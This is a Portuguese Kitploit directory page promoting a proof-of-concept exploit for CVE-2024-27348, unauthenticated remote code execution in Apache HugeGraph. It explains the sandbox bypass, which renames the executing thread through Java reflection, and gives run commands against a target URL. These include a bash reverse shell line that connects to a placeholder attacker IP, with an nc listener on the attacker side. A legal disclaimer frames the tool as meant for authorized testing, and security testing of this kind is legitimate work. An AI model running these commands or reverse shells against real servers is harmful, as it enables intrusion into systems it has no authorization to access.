Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-27348-HugeGraph-RCE — Exploração PoC avançada para CVE-2024-27348, alcançando RCE confiável no Apache HugeGraph via bypass de sandbox e execução de comandos não cega. | Kitploit
Ferramentas/GitHubGitHub/akelaqe/cve-2024-27348-hugegraph-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubakelaqe/cve-2024-27348-hugegraph-rce

CVE-2024-27348-HugeGraph-RCE

Exploração PoC avançada para CVE-2024-27348, alcançando RCE confiável no Apache HugeGraph via bypass de sandbox e execução de comandos não cega.

Ver Repositório
12há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-27348: RCE no Apache HugeGraph (Bypass Avançado de Sandbox)

Python 3.x Exploit CVE

Um exploit de Prova de Conceito (PoC) avançado e altamente confiável para CVE-2024-27348 (Execução Remota de Código no Apache HugeGraph Server).

Ao contrário de muitos PoCs públicos que executam comandos às cegas ou falham em payloads complexos devido às limitações de Runtime.exec() do Java, este script foi desenvolvido para confiabilidade em cenários reais de teste de penetração.

⚠️ Aviso Legal

Apenas para Fins Educacionais e de Teste Autorizado. Esta ferramenta é fornecida para pesquisadores de segurança, testadores de penetração e administradores de sistemas verificarem a vulnerabilidade em ambientes autorizados. O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta.

✨ Recursos e Melhorias Técnicas

Este exploit melhora os PoCs públicos iniciais ao abordar três problemas críticos:

  1. Bypass da Sandbox do HugeSecurityManager: A sandbox do HugeGraph bloqueia a execução se a thread chamadora for nomeada gremlin-server-exec-* ou task-worker-*. Este payload usa Java Reflection para renomear dinamicamente a thread de execução para BypassThread antes de acionar o payload, evadindo perfeitamente o security manager.
  2. Tratamento de Payloads Complexos: Em vez de Runtime.getRuntime().exec(String), que quebra comandos bash complexos (como reverse shells) em espaços, este exploit usa ProcessBuilder com uma List<String> formatada corretamente. Isso permite a execução segura de payloads complexos com aspas e redirecionamentos.
  3. Leitura Completa da Saída (RCE Não-Cego): O script lê o InputStream do processo executado usando um Scanner do Java e retorna a saída real do comando na resposta HTTP JSON. Você vê exatamente o que o servidor vê.

⚙️ Requisitos

  • Python 3.x
  • Biblioteca requests

Instale as dependências necessárias:

root@kitploit:~
pip3 install requests

🚀 Uso

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -c <COMMAND>

Exemplos

  1. Execução Básica de Comando (Lendo a saída):
root@kitploit:~
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
  1. Criando um Reverse Shell: Como o payload lida corretamente com espaços e aspas, você pode injetar um reverse shell bash padrão diretamente, sem precisar codificá-lo em base64 ou prepará-lo em etapas:
root@kitploit:~
# On your attacker machine, start a listener:
nc -lvnp 4444

# Execute the exploit:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

🔍 Detalhes da Vulnerabilidade

O Apache HugeGraph Server expõe um endpoint da API Gremlin (/gremlin) que permite aos usuários enviar scripts Groovy. Devido à sandbox insuficiente nas versões anteriores à correção, um atacante não autenticado pode executar comandos arbitrários do sistema operacional via Java Reflection.

Baixar ferramenta